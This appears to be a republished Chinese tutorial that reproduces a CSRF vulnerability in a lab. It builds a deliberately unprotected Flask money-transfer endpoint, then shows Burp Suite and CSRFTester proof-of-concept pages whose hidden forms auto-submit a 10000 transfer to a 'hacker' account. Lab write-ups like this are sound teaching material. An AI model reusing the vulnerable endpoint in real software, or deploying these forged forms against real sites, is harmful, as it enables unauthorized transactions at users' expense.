CSRF漏洞复现及测试工具讲解

news/2025/1/10 16:49:07/文章来源:https://www.cnblogs.com/xfbk/p/18140125

一、Python编写一个存在CSRF漏洞

①　编写html网页

<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>转账</title>
</head>
<body><h1>转账</h1><form action="/transfer" method="post"><label for="amount">金额：</label><input type="text" name="amount" required><br><label for="recipient">接收者：</label><input type="text" name="recipient" required><br><input type="submit" value="提交"></form>
</body>
</html>

②　编写网页请求接口代码

from flask import Flask, request, render_templateapp = Flask(__name__, template_folder='template')
@app.route('/')
def index():return render_template('transfer.html')@app.route('/transfer', methods=['GET', 'POST'])
def transfer():if request.method == 'POST':amount = request.form['amount']recipient = request.form['recipient']# 执行转账操作，将指定金额从当前用户转移到指定的接收者账户return f"成功转账 {amount} 给 {recipient}"return render_template(r'transfer.html')if __name__ == '__main__':app.run(host='10.162.95.61')

③　运行代码

④　测试网页功能是否正常

输入转账进入，接收转账人员，点击

这个示例代码存在一个CSRF漏洞。攻击者可以通过构造恶意的HTML表单或JavaScript代码，诱导用户点击链接或提交表单，从而在用户不知情的情况下执行转账操作。由于没有适当的CSRF防护措施，攻击者可以利用这个漏洞进行非法的转账操作

二、BurpSuite抓取/拦截转账请求

我们的目标是测试这个转账功能是否存在CSRF漏洞。

（1）运行上面例子的Python代码并访问主页

（2）输入转账金额和接收人点击提交，BurpSuite会抓取或拦截转账请求。

抓包找到该接口-右键-相关工具-生成对应POC

复制html本地保存生成的POC文件，文件格式XXX.html

生成的恶意HTML页面如下所示：

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><form action="http://10.162.95.61:5000/transfer" method="POST"><input type="hidden" name="amount" value="10000" /><input type="hidden" name="recipient" value="test" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body>
</html>

将接收转账的账号修改成自己的账号，如hacker

访问这个恶意的网页点击恶意网页中的“Submit request”按钮

如果受害者点击了页面上的“Submit request”按钮，浏览器会发送转账请求到目标网站修改密码页面，导致向"hacker"账号转账了10000元，这表明存在CSRF漏洞。

三、CSRFTester自动化探测工具

CSRFTester 工具的测试原理大概是这样的，使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息，通过在 CSRFTester 中修改相应的表单等信息，重新提交，相当于一次伪造客户端请求，如果修改过的测试请求，成功被网站服务器接受，则说明存在 CSRF 漏洞，当然此款工具也可以被用来进行 CSRF 攻击。
步骤如下
（1）、设置浏览器代理：127.0.0.1:8008
（ 2）、登录 Web 应用程序，提交表单，在 CSRF 工具中修改表单内容，查看是否更改，如果更改表单存在 CSRF 漏洞。
（ 3）、生产 POC 代码。

1、启动 CSRFTester

需要安装 JDK8

开始录制

备注：工具默认代理127.0.0.1:8008，浏览器代理插件设置对应的端口即可

修改表单内容

生成 html 文件

表单内容仅保留方框中我们提交的信息，其他内容一律删除，然后保存退出

<form method="POST" name="form2" action="http://10.162.95.61:5000/transfer">
<input type="hidden" name="amount" value="10000"/>
<input type="hidden" name="recipient" value="hacker1111"/>
</form>

运行生成的html文件